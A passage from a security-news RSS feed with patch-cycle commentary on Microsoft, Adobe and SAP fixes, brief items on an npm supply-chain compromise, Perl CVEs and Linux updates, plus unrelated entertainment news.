<p class="wp-block-paragraph">He added, “for CSOs, the challenge is no longer just defending against threat actors, it’s keeping up with an accelerating cycle of vulnerabilities and updates across the Microsoft ecosystem in the AI era. Security leaders should think critically about diversifying their vendors to protect their enterprise and save time and money on patching an increasing list of bugs that nearly tripled month-over-month.”</p>



<p class="wp-block-paragraph">“While the sheer number of [Microsoft] vulnerabilities might seem alarming on the surface,” said <a href="https://www.linkedin.com/in/nicholasacarroll/">Nick Carroll</a> and <a href="https://www.linkedin.com/in/rainmbaker/">Rain Baker</a> of the Nightwing ShadowScout threat intelligence team, “this can actually be seen as a positive sign for enterprise security. It means vendors are finding and fixing flaws before adversaries can weaponize them en masse.”</p>



<p class="wp-block-paragraph">And <a href="https://www.fortra.com/profile/josh-taylor">Josh Taylor</a>, lead cybersecurity analyst at Fortra, noted that 26 of the Microsoft vulnerabilities have a CVSS base score above 9.0, and 13 of those sit at 9.8. “That matters,” he said, “but CVSS is still only one part of the risk story. The real triage problem this month is the mix of exploited issues, a publicly disclosed BitLocker flaw, and a massive concentration of vulnerabilities in Windows and Office.” </p>



<p class="wp-block-paragraph">He said, “for patching teams, this is the kind of month that rewards discipline. The right move is not panic, it is sequencing: put exploited issues and exposed infrastructure first, then let the normal validation process do its job.”</p>



<h2 class="wp-block-heading">Others increasing their patch cadence too</h2>



<p class="wp-block-paragraph"><a href="https://www.ivanti.com/blog/authors/chris-goettl">Chris Goettl</a>, vice-president of product management at Ivanti, noted many software vendors in addition to Microsoft are increasing their security update cadence. For example, Cisco Systems has just shifted to a risk-based, twice-monthly disclosure model (the first and third Wednesday of each month), Mozilla is on a near weekly security update march, and Oracle’s new Critical Security Patch Update (CSPU) program has been delivering targeted critical-severity fixes on the 3rd Tuesday of non-CPU months since May.</p>



<p class="wp-block-paragraph">Nightwing also noted that Adobe issued 12 separate security bulletins for products in its first twice-monthly bulletin. Administrators must treat today’s Priority 1 ColdFusion update (APSB26-82) with urgency, as it patches a critical 9.9 CVSS path traversal vulnerability (CVE-2026-48318). It’s one of 11 ColdFusion vulnerabilities patched. </p>



<p class="wp-block-paragraph">Additionally, retail and web administrators should immediately prioritize Adobe Commerce (APSB26-73), which resolves a 9.6 CVSS flaw allowing unrestricted uploads of dangerous file types (CVE-2026-48356).</p>



<h2 class="wp-block-heading">SAP vulnerabilities</h2>



<p class="wp-block-paragraph"><a href="https://pathlock.com/author/jonathan-stross/">Jonathan Stross</a>, senior product manager for cybersecurity research and innovation at Pathlock, said the most critical of the SAP fixes is Note 3747367, a memory corruption vulnerability in NetWeaver Application Server ABAP, with a CVSS score of 9.9. The vulnerability affects the ABAP Application Server, SAP Kernel, and frontend services tied to SAP GUI for HTML.</p>



<p class="wp-block-paragraph"> According to SAP, an authenticated attacker can trigger logical memory-management errors that may lead to unauthorized data access, data modification, or system unavailability. The likely attack scenario involves a compromised account or malicious insider abusing a crafted request that reaches the vulnerable code path. </p>



<p class="wp-block-paragraph">“Because a successful exploit can impact confidentiality, integrity, and availability at the platform level, while potentially destabilizing a core ABAP system, organizations should treat this as the highest-priority patch in the July release,” Stross said. </p>



<p class="wp-block-paragraph">Prioritize the critical ABAP kernel issue, plus the AppRouter request smuggling note, and the Commerce Cloud sample-credential issue first, he said, because these are the most likely to produce direct security impact in real environments.</p>



<p class="wp-block-paragraph">But do not treat the updated notes as noise, he added. The July overview includes three re-released items that still matter operationally, and this should be reflected in patch planning and change records. The attack surface is distributed: ABAP, Java, BTP, Commerce, SAProuter, UI5, and supporting libraries all appear in the same monthly cycle, so patching needs coordinated platform ownership.</p>



<p class="wp-block-paragraph"><a href="https://onapsis.com/post-author/thomas-fritsch/">Thomas Fritsch</a>, an SAP researcher at Onapsis, described the <a href="https://onapsis.com/blog/sap-security-patch-day-july-2026/">SAP Security notes</a> in detail and noted that SAP teams who can’t immediately install the NetWeaver memory corruption fix can, as a temporary workaround, disable all ICF nodes with a specific property in transaction SICF. However, since the workaround will disable opening transactions in SAP GUI for HTML, it is not an option for all customers and it is strongly recommended to install the patched ABAP Kernel version.</p>



<h2 class="wp-block-heading">Patching should become continuous</h2>



<p class="wp-block-paragraph">“AI is likely to expose new classes of weaknesses, and will introduce some of its own through AI-assisted development,” commented <a href="https://www.linkedin.com/in/thegenemoody/">Gene Moody</a>, Field CTO at Action1. “Logically, with that in mind, the future of updating must become more continuous, more adaptive, and less tied to a fixed calendar. Discovery will not follow business logic; it will be swift and unforgiving. We must accept that, and be just as diligent in our defense, because the cost of failure is higher than the inconvenience of change.” </p>



<p class="wp-block-paragraph">He added, “in my crystal ball, I see a future where Microsoft and others move steadily away from scheduled monthly patch cycles in favor of rolling updates for most security issues in as close to live time as they can be researched and released. That would be a win for the entire industry. Faster patch creation and delivery, paired with more agile practices on the customer side, would finally start to align patching with the pace of modern discovery and exploitation.” </p>



<p class="wp-block-paragraph">“What needs to happen is simple,” he said. “Patching on a calendar is no longer a safe assumption in today’s threat landscape. Patching where and when needed versus scheduled is the only path forward.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Weekly Update 512: IoT Lockout Fail]]></title>
<description><![CDATA["Build a smart home", they said. "It'll make life so much better", they said. Well, life wasn't very bloody good at 23:00 the other night after travelling 33 hours from Paris only to find the IoT doorlock batteries dead and the]]></description>
<link>https://tsecurity.de/de/3669349/it-security-nachrichten/weekly-update-512-iot-lockout-fail/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3669349/it-security-nachrichten/weekly-update-512-iot-lockout-fail/</guid>
<pubDate>Wed, 15 Jul 2026 02:52:16 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>"Build a smart home", they said. "It'll make life so much better", they said. Well, life wasn't very bloody good at 23:00 the other night after travelling 33 hours from Paris only to find the IoT doorlock batteries dead and <a href="https://www.youtube.com/shorts/80aQgCXr8Ko?ref=troyhunt.com" rel="noreferrer">the</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[When the Negotiator Helps Hackers]]></title>
<description><![CDATA[Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:31 A ransomware negotiator was sentenced to federal prison after prosecutors said he secretly worked with the BlackCat ransomware group while negotiating on behalf of victims. According to court filings, he shared insurance limits, ...]]></description>
<link>https://tsecurity.de/de/3669200/it-security-video/when-the-negotiator-helps-hackers/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3669200/it-security-video/when-the-negotiator-helps-hackers/</guid>
<pubDate>Wed, 15 Jul 2026 00:18:33 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:31 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/M8CgmsqoDXg?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>A ransomware negotiator was sentenced to federal prison after prosecutors said he secretly worked with the BlackCat ransomware group while negotiating on behalf of victims. According to court filings, he shared insurance limits, negotiating positions, and internal settlement thresholds.<br />
<br />
The case illustrates that insider threats aren't limited to employees inside victim organizations. Even trusted third parties can become a critical point of failure when handling sensitive incident response information.<br />
<br />
What safeguards should organizations require when sharing sensitive information with outside incident response and ransomware negotiation firms?<br />
<br />
Subscribe to our podcasts: https://securityweekly.com/subscribe<br />
<br />
#Ransomware #InsiderThreat #SecurityWeekly #Cybersecurity #InformationSecurity #AI #InfoSec<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Mr. Data, Joomla Babooa, 1VPNS, RabbitMQ, UEFI, Center 16, Sextortion, Aaran Leyland - SWN #598]]></title>
<description><![CDATA[Mr. Data, Joomla Babooa, 1VPNS, RabbitMQ, UEFI, Center 16, Sextortion, Aaran Leyland, and More on the Security Weekly News. Visit https://www.securityweekly.com/swn for all the latest episodes! Show Notes: https://securityweekly.com/swn-598]]></description>
<link>https://tsecurity.de/de/3669151/it-security-nachrichten/mr-data-joomla-babooa-1vpns-rabbitmq-uefi-center-16-sextortion-aaran-leyland-swn-598/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3669151/it-security-nachrichten/mr-data-joomla-babooa-1vpns-rabbitmq-uefi-center-16-sextortion-aaran-leyland-swn-598/</guid>
<pubDate>Tue, 14 Jul 2026 23:22:29 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Mr. Data, Joomla Babooa, 1VPNS, RabbitMQ, UEFI, Center 16, Sextortion, Aaran Leyland, and More on the Security Weekly News.</p> <p>Visit <a rel="noopener" target="_blank" href="https://www.securityweekly.com/swn">https://www.securityweekly.com/swn</a> for all the latest episodes!</p> <p>Show Notes: <a rel="noopener" target="_blank" href="https://securityweekly.com/swn-598">https://securityweekly.com/swn-598</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Mr. Data, Joomla Babooa, 1VPNS, RabbitMQ, UEFI, Center 16, Sextortion, Aaran Leyland - SWN #598]]></title>
<description><![CDATA[Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:0 Mr. Data, Joomla Babooa, 1VPNS, RabbitMQ, UEFI, Center 16, Sextortion, Aaran Leyland, and More on the Security Weekly News. 

Visit https://www.securityweekly.com/swn for all the latest episodes!

Show Notes: https://securityweekl...]]></description>
<link>https://tsecurity.de/de/3669129/it-security-video/mr-data-joomla-babooa-1vpns-rabbitmq-uefi-center-16-sextortion-aaran-leyland-swn-598/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3669129/it-security-video/mr-data-joomla-babooa-1vpns-rabbitmq-uefi-center-16-sextortion-aaran-leyland-swn-598/</guid>
<pubDate>Tue, 14 Jul 2026 23:01:52 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:0 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/nXufkyBiQ8E?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Mr. Data, Joomla Babooa, 1VPNS, RabbitMQ, UEFI, Center 16, Sextortion, Aaran Leyland, and More on the Security Weekly News. <br />
<br />
Visit https://www.securityweekly.com/swn for all the latest episodes!<br />
<br />
Show Notes: https://securityweekly.com/swn-598<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Stop Securing AI in Silos]]></title>
<description><![CDATA[Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:0 AI application security includes many protections—input validation, output sanitization, infrastructure controls, and more. Too often, they're evaluated independently instead of as parts of a larger system.

A holistic approach al...]]></description>
<link>https://tsecurity.de/de/3668955/it-security-video/stop-securing-ai-in-silos/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3668955/it-security-video/stop-securing-ai-in-silos/</guid>
<pubDate>Tue, 14 Jul 2026 21:04:08 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:0 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/U_vC1VxQccs?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>AI application security includes many protections—input validation, output sanitization, infrastructure controls, and more. Too often, they're evaluated independently instead of as parts of a larger system.<br />
<br />
A holistic approach allows security controls to inform each other, more closely matching how humans analyze risk. That shift also aligns with broader secure-by-design principles, focusing on the security of the entire architecture rather than individual components.<br />
<br />
Should AI AppSec evolve from isolated controls to systems that reason across the full security context?<br />
<br />
Subscribe to our podcasts: https://securityweekly.com/subscribe<br />
<br />
#AppSec #SecurityWeekly #Cybersecurity #InformationSecurity #AI #InfoSec<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple TV Drops First Trailer for Ryan Reynolds’ Wild New Action-Comedy Mayday]]></title>
<description><![CDATA[Apple TV has released the first trailer for Mayday, an upcoming action-comedy movie starring Ryan Reynolds and Kenneth Branagh. The Cold War adventure sends Reynolds behind enemy lines, where his dangerous military mission quickly turns into an unexpected survival story filled with explosions, ch...]]></description>
<link>https://tsecurity.de/de/3668831/ios-mac-os/apple-tv-drops-first-trailer-for-ryan-reynolds-wild-new-action-comedy-mayday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3668831/ios-mac-os/apple-tv-drops-first-trailer-for-ryan-reynolds-wild-new-action-comedy-mayday/</guid>
<pubDate>Tue, 14 Jul 2026 19:54:08 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple TV has released the first trailer for Mayday, an upcoming action-comedy movie starring Ryan Reynolds and Kenneth Branagh. The Cold War adventure sends Reynolds behind enemy lines, where his dangerous military mission quickly turns into an unexpected survival story filled with explosions, chases and awkward humour.




https://www.youtube.com/watch?v=om5Un9X720M




The trailer introduces Reynolds as Lieutenant Troy “Assassin” Kelly, a confident US Navy pilot sent on a secret mission over Soviet territory. When his aircraft goes down, Troy becomes stranded in Russia with enemy forces searching for him. His only hope of survival comes from Nikolai Ustinov, a former KGB agent played by Branagh, who appears unusually fascinated by American culture.




Movie: Mayday



Release date: September 4, 2026



Streaming platform: Apple TV



Runtime: 1 hour and 51 minutes



Genre: Action, comedy, adventure and spy thriller



Directors: John Francis Daley and Jonathan Goldstein



Main cast: Ryan Reynolds, Kenneth Branagh, Maria Bakalova, Marcin Dorociński and David Morse




What Happens in the Mayday Trailer?



Minor trailer spoilers follow.



The Mayday trailer begins with Troy preparing for a classified operation during the height of the Cold War. His confidence suggests that he expects another successful mission, although the situation collapses after he enters Russian airspace and crash-lands in the wilderness.



Troy soon meets Nikolai, who decides to hide the American pilot instead of reporting him. Their first interactions establish the movie’s buddy-comedy style, with Troy struggling to understand whether his unlikely rescuer can genuinely be trusted.



Nikolai seems far more interested in American music, food and popular culture than Soviet politics. This creates several lighter moments as the two characters attempt to communicate while soldiers close in on their location.



The trailer also shows gunfights, military vehicles, snowy landscapes and several escape attempts. Troy still behaves like a fearless action hero, while Nikolai approaches danger with a calmer and less predictable attitude. Their different personalities appear to drive much of the comedy.



Where Is the Story Heading?



Troy and Nikolai will have to cross Soviet territory while avoiding soldiers, intelligence officers and anyone searching for the missing pilot. Their journey appears to grow into a larger escape mission as Nikolai risks his own safety to help Troy return home.



The central mystery involves Nikolai’s reasons for helping an American officer. His interest in Western culture offers one explanation, although the trailer suggests that he has personal reasons for turning against the people hunting Troy.



The movie also appears to build a genuine friendship between the two men. Troy begins the story as a self-assured pilot who expects to handle every problem alone, but surviving Russia requires him to trust someone he would normally consider an enemy.



John Francis Daley and Jonathan Goldstein wrote and directed Mayday. The filmmakers previously worked together on Game Night and Dungeons &amp; Dragons: Honor Among Thieves, which also combined action, character-based comedy and emotional storytelling.



FAQs



When does Mayday come out on Apple TV? Mayday premieres globally on Apple TV on Friday, September 4, 2026. The movie will arrive as a complete feature film, so viewers will not have to wait for weekly episodes.  Is Mayday a movie or a series? Mayday is a movie with a reported runtime of 111 minutes. It is currently planned as a standalone Apple Original Film rather than an episodic series.  Who does Ryan Reynolds play in Mayday? Ryan Reynolds plays Lieutenant Troy “Assassin” Kelly, a skilled US Navy pilot whose classified operation fails after he enters Soviet territory.  Who does Kenneth Branagh play? Kenneth Branagh plays Nikolai Ustinov, a former KGB agent who rescues Troy and helps him hide from Soviet forces.  Is Mayday based on a true story? Mayday is presented as an original fictional Cold War adventure. No official details describe the movie as a true story or an adaptation of real events.  Will Mayday receive a cinema release? The movie is currently scheduled to premiere directly on Apple TV. A wide theatrical release has not been announced.  



Mayday arrives on Apple TV on September 4, bringing together Ryan Reynolds and Kenneth Branagh for a Cold War escape story with action, humour and an unusual friendship at its centre.



Apple TV costs $12.99 per month in the US, with pricing varying across other regions. Are you planning to watch Mayday when it arrives? Let us know in the comments.]]></content:encoded>
</item>
<item>
<title><![CDATA[AsyncAPI npm Packages With 2M Weekly Downloads Compromised via GitHub Actions]]></title>
<description><![CDATA[A supply chain compromise has placed AsyncAPI npm packages at the center of a developer security incident. Five trojanized releases, with roughly 2.9 million combined weekly downloads, were published after an attacker gained access to an npm publishing token. The…
Read more →
The post AsyncAPI np...]]></description>
<link>https://tsecurity.de/de/3668792/it-security-nachrichten/asyncapi-npm-packages-with-2m-weekly-downloads-compromised-via-github-actions/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3668792/it-security-nachrichten/asyncapi-npm-packages-with-2m-weekly-downloads-compromised-via-github-actions/</guid>
<pubDate>Tue, 14 Jul 2026 19:32:27 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A supply chain compromise has placed AsyncAPI npm packages at the center of a developer security incident. Five trojanized releases, with roughly 2.9 million combined weekly downloads, were published after an attacker gained access to an npm publishing token. The…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/asyncapi-npm-packages-with-2m-weekly-downloads-compromised-via-github-actions/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/asyncapi-npm-packages-with-2m-weekly-downloads-compromised-via-github-actions/">AsyncAPI npm Packages With 2M Weekly Downloads Compromised via GitHub Actions</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Maximum Pleasure Guaranteed Episode 10: Release Date and What to Expect]]></title>
<description><![CDATA[The Maximum Pleasure Guaranteed finale will be released on Apple TV on Wednesday, July 15, 2026. Episode 10 will conclude Paula Sanders’ dangerous investigation after a season filled with murder, blackmail, family problems, and increasingly risky decisions.



Finale Release Details




Finale re...]]></description>
<link>https://tsecurity.de/de/3668621/ios-mac-os/maximum-pleasure-guaranteed-episode-10-release-date-and-what-to-expect/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3668621/ios-mac-os/maximum-pleasure-guaranteed-episode-10-release-date-and-what-to-expect/</guid>
<pubDate>Tue, 14 Jul 2026 18:18:24 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The Maximum Pleasure Guaranteed finale will be released on Apple TV on Wednesday, July 15, 2026. Episode 10 will conclude Paula Sanders’ dangerous investigation after a season filled with murder, blackmail, family problems, and increasingly risky decisions.



Finale Release Details




Finale release date: Wednesday, July 15, 2026



Episode: Season 1, Episode 10



Episode title: “Queens”



Streaming platform: Apple TV



Genre: Dark comedy and thriller



Season length: 10 episodes



Typical duration: Around 30 minutes



Created by: David J. Rosen



Directed by: David Gordon Green



Main cast: Tatiana Maslany, Jake Johnson, Jessy Hodges, Dolly de Leon, Jon Michael Hill, Charlie Hall, Kiarra Hamagami Goldberg, Nola Wallace, Brandon Flynn, and Murray Bartlett




Apple premiered the first two episodes on May 20 before releasing one episode every Wednesday. The weekly schedule ends with Episode 10 on July 15.



What Time Will the Maximum Pleasure Guaranteed Finale Be Released?



Apple lists July 15 as the official Maximum Pleasure Guaranteed finale release date. However, Apple TV frequently makes new episodes available at approximately 9 p.m. Eastern Time on the previous evening in the United States.



Viewers should therefore check Apple TV from Tuesday night, July 14, depending on their location. In India, the finale should appear during the morning of Wednesday, July 15, although the exact availability can differ slightly by account and region.



Where Is the Story Heading Before Episode 10?



Spoilers ahead for Maximum Pleasure Guaranteed Season 1.



Paula started the season as a newly divorced mother facing a custody dispute and an identity crisis. Her life changed after she became convinced that she had witnessed a serious crime during an online encounter.



Her attempt to uncover the truth pulled her into a larger mystery involving blackmail, violence, suspicious packages, and people who repeatedly questioned her judgement. At the same time, every new discovery affected her relationship with her daughter Hazel, her former husband Karl, and Karl’s new partner, Mallory.



By the end of Episode 9, the investigation had reached its most dangerous stage. Paula had collected enough information to believe that the events surrounding her were connected, but proving the conspiracy remained difficult. The episode left several characters facing immediate danger while Paula moved closer to the person responsible.



What Can Viewers Expect From the Finale?



The finale will need to resolve the central mystery surrounding the crime Paula believes she witnessed. It should also reveal whether her investigation saves her family or creates another problem she cannot easily escape.



Episode 10 is also expected to address Paula’s custody battle and her strained relationship with Hazel. Those personal issues have remained closely connected to the investigation throughout the season, since Paula’s actions have repeatedly raised questions about her stability and decision-making.



Rudy and Geri’s storyline could also receive an important conclusion. Their partnership developed while they helped investigate the case, and their growing connection became one of the season’s lighter elements. However, Geri’s secrets have created uncertainty about where their relationship is heading.



Will There Be a Maximum Pleasure Guaranteed Season 2?



Apple has not announced Maximum Pleasure Guaranteed Season 2 at the time of writing. The series was introduced as a 10-episode season rather than a confirmed limited series, leaving room for another chapter if the finale keeps part of the story open.



The decision will likely depend on viewership, audience response, and whether the creators have another story planned for Paula. For now, Episode 10 serves as the final confirmed episode.



The Maximum Pleasure Guaranteed finale streams on Apple TV on July 15. What do you plan to watch after the season ends? Let us know in the comments.]]></content:encoded>
</item>
<item>
<title><![CDATA[AsyncAPI npm Packages With 2M Weekly Downloads Compromised via GitHub Actions]]></title>
<description><![CDATA[A supply chain compromise has placed AsyncAPI npm packages at the center of a developer security incident. Five trojanized releases, with roughly 2.9 million combined weekly downloads, were published after an attacker gained access to an npm publishing token. The incident creates risk for develop...]]></description>
<link>https://tsecurity.de/de/3668506/it-security-nachrichten/asyncapi-npm-packages-with-2m-weekly-downloads-compromised-via-github-actions/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3668506/it-security-nachrichten/asyncapi-npm-packages-with-2m-weekly-downloads-compromised-via-github-actions/</guid>
<pubDate>Tue, 14 Jul 2026 17:41:57 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A supply chain compromise has placed AsyncAPI npm packages at the center of a developer security incident. Five trojanized releases, with roughly 2.9 million combined weekly downloads, were published after an attacker gained access to an npm publishing token. The incident creates risk for development workstations, build servers, and environments that loaded the affected modules. […]</p>
<p>The post <a href="https://cybersecuritynews.com/asyncapi-npm-packages-with-2m-weekly-downloads/">AsyncAPI npm Packages With 2M Weekly Downloads Compromised via GitHub Actions</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Madden football returns to Mac for the first time in 19 years]]></title>
<description><![CDATA[Madden finally returns to the Mac after a 19 year absence, making "Madden NFL 27 Arcade Edition" the biggest football release in Apple Arcade history.Madden NFL 27 Arcade EditionThe game launches August 6 and includes current NFL teams, realistic simulation gameplay and a season-based Franchise m...]]></description>
<link>https://tsecurity.de/de/3668403/ios-mac-os/madden-football-returns-to-mac-for-the-first-time-in-19-years/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3668403/ios-mac-os/madden-football-returns-to-mac-for-the-first-time-in-19-years/</guid>
<pubDate>Tue, 14 Jul 2026 16:57:17 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Madden finally returns to the Mac after a 19 year absence, making "Madden NFL 27 Arcade Edition" the biggest football release in Apple Arcade history.<br><br><div><img src="https://photos5.appleinsider.com/gallery/68243-143865-IMG_7995-xl.jpg" alt="Football quarterback mid-throw against a dark city skyline at dusk, with EA Sports Madden NFL 27 Arcade Edition logo centered, and small NFL and NFLPA logos near the bottom" height="738"><span>Madden NFL 27 Arcade Edition</span></div><br>The game launches August 6 and includes current NFL teams, realistic simulation gameplay and a season-based Franchise mode. Players can also jump into individual games through Quick Play.<br><br>Franchise mode puts players in charge as general managers, where they can build a roster, manage season-changing storylines and try to win over the team's fan base. A weekly story engine will drive those narratives, while dynamic player ratings will change based on real NFL performances.<br><br><div><img src="https://photos5.appleinsider.com/gallery/68243-143866-IMG_7996-xl.jpg" alt="Smartphone screen showing an American football video game, with Vikings leading Bears 7—0, offensive formation on the field, virtual buttons overlaid, and a large stadium crowd in the background" height="738"><span>Fan-favorite modes and seamless controller support deliver a console-quality Madden experience right in players' hands.</span></div><br><br> <a href="https://appleinsider.com/articles/26/07/14/madden-football-returns-to-mac-for-the-first-time-in-19-years?utm_source=rss">Continue Reading on AppleInsider</a> | <a href="https://forums.appleinsider.com/discussion/244951?urm_source=rss">Discuss on our Forums</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[AI's Hidden Security Layer]]></title>
<description><![CDATA[Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:3 AI security is changing. The biggest risk is no longer simply whether employees are using AI—it's what they're asking AI to process. Sensitive prompts can expose confidential information in ways traditional security tools weren't ...]]></description>
<link>https://tsecurity.de/de/3668276/it-security-video/ais-hidden-security-layer/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3668276/it-security-video/ais-hidden-security-layer/</guid>
<pubDate>Tue, 14 Jul 2026 16:19:17 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:3 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/JKfVvaAINHQ?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>AI security is changing. The biggest risk is no longer simply whether employees are using AI—it's what they're asking AI to process. Sensitive prompts can expose confidential information in ways traditional security tools weren't built to observe.<br />
<br />
EDR, antivirus, and network monitoring intentionally avoid collecting large amounts of content, leaving organizations with limited visibility into AI interactions. That makes discovering shadow AI usage and understanding how people access AI tools increasingly important.<br />
<br />
Is your organization monitoring AI usage itself, or is it prepared to understand the content and data flowing through those AI interactions?<br />
<br />
Subscribe to our podcasts: https://securityweekly.com/subscribe<br />
<br />
#DataSecurity #SecurityWeekly #Cybersecurity #InformationSecurity #AI #InfoSec<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Tuesday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (389-ds:1.4, buildah, freeipmi, freerdp, gegl, gimp, golang, kernel, libreoffice, maven:3.9, openexr, perl-DBI, plexus-utils, podman, tomcat, tomcat9, xorg-x11-server, and xorg-x11-server-Xwayland), Debian (imagemagick, p7zip, and redis), Fedora (bre...]]></description>
<link>https://tsecurity.de/de/3668095/linux-tipps/security-updates-for-tuesday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3668095/linux-tipps/security-updates-for-tuesday/</guid>
<pubDate>Tue, 14 Jul 2026 15:26:32 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (389-ds:1.4, buildah, freeipmi, freerdp, gegl, gimp, golang, kernel, libreoffice, maven:3.9, openexr, perl-DBI, plexus-utils, podman, tomcat, tomcat9, xorg-x11-server, and xorg-x11-server-Xwayland), <b>Debian</b> (imagemagick, p7zip, and redis), <b>Fedora</b> (breezy, calibre, and golang-github-openprinting-ipp-usb), <b>Mageia</b> (ffmpeg, gzip, haproxy, libheif, libtiff, libxml2, packages, perl-List-SomeUtils-XS, and perl-Socket), <b>SUSE</b> (alsa, chromedriver, curl, dhcpcd, docker-compose, glibc, haproxy, ImageMagick, jq, kernel, kubernetes, libpng15, libredwg-devel, libslirp, nghttp2, php8, python-Pillow, python313-Django, python313-weasyprint, qemu, rust-keylime, sccache, and systemd), and <b>Ubuntu</b> (cifs-utils, libexif, libreoffice, libssh2, openssh, and pipewire).]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-13221 | Perl up to 5.43.9 Trie Perl_study_chunk branch incorrect regex (Nessus ID 326561)]]></title>
<description><![CDATA[A vulnerability was found in Perl up to 5.43.9. It has been classified as critical. This vulnerability affects the function Perl_study_chunk of the component Trie. Performing a manipulation of the argument branch results in incorrect regular expression.

This vulnerability is reported as CVE-2026...]]></description>
<link>https://tsecurity.de/de/3667977/sicherheitsluecken/cve-2026-13221-perl-up-to-5439-trie-perlstudychunk-branch-incorrect-regex-nessus-id-326561/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667977/sicherheitsluecken/cve-2026-13221-perl-up-to-5439-trie-perlstudychunk-branch-incorrect-regex-nessus-id-326561/</guid>
<pubDate>Tue, 14 Jul 2026 14:53:01 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/perl">Perl up to 5.43.9</a>. It has been classified as <a href="https://vuldb.com/kb/risk">critical</a>. This vulnerability affects the function <code>Perl_study_chunk</code> of the component <em>Trie</em>. Performing a manipulation of the argument <em>branch</em> results in incorrect regular expression.

This vulnerability is reported as <a href="https://vuldb.com/cve/CVE-2026-13221">CVE-2026-13221</a>. The attack is possible to be carried out remotely. No exploit exists.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-57432 | Perl up to 5.43.10 S_measure_struct repeat integer overflow (Nessus ID 326568)]]></title>
<description><![CDATA[A vulnerability was found in Perl up to 5.43.10. It has been declared as problematic. This issue affects some unknown processing of the component S_measure_struct. Executing a manipulation of the argument repeat can lead to integer overflow.

This vulnerability appears as CVE-2026-57432. The atta...]]></description>
<link>https://tsecurity.de/de/3667916/sicherheitsluecken/cve-2026-57432-perl-up-to-54310-smeasurestruct-repeat-integer-overflow-nessus-id-326568/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667916/sicherheitsluecken/cve-2026-57432-perl-up-to-54310-smeasurestruct-repeat-integer-overflow-nessus-id-326568/</guid>
